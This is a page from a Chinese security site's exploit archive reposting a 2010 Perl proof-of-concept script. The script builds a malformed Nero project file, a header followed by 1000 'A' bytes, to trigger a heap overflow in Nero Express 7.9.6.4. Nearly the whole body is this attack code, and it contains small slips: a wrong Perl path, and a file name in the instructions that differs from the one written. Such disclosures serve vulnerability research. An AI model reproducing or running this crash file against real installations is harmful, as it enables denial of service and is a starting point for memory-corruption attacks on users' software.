首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Nero Express v7.9.6.4 Local Heap PoC
来源:vfocus.net 作者: D3V!L FUCKER 发布时间:2010-01-04  
#!/user/bin/perl
# Exploit Title: [Nero Express7 Local Heap Poc]
# Date: [2010/01/01]
# Author: [D3V!L FUCKER]
# Version: [Nero Express7 Ver.7.9.6.4]
# Tested on: [windows vista sp0]
#After Setup Open Nero StartSmart Essentials => Favorites => Open Projects => explit.nir
# Code :
$headr=
"\xFF\xFE\xFF\x0E\x4E\x00\x65\x00\x72\x00\x6F\x00\x49\x00\x53\x00".
"\x4F\x00\x30\x00\x2E\x00\x30\x00\x33\x00\x2E\x00\x30\x00\x31\x00";

$boom="A" x 1000;

open(myfile,'>>exploit.nri') || die "Cannot Creat file\n\n";
print myfile $headr;
print myfile $boom;
print "Done..!~#\n";




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·DZOIC Handshakes Auth Bypass S
·Mini-NUKE v2.3 Freehost Multi
·BlaB! 2.1b2 Backup files Vulne
·Switch Sound File Converter .m
·XlentCMS V1.0.4 (downloads.php
·Joomla Component com_avosbille
·Dating Agent PRO Multi Vulnera
·DZOIC ClipHouse suffer from au
·WD-CMS 3.0 Multiple Vulnerabil
·VSO Medoa Player Version 1.0.2
·Multiple XSS in cms WCPS v4.3.
·GOM player V 2.1.9 Local crash
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved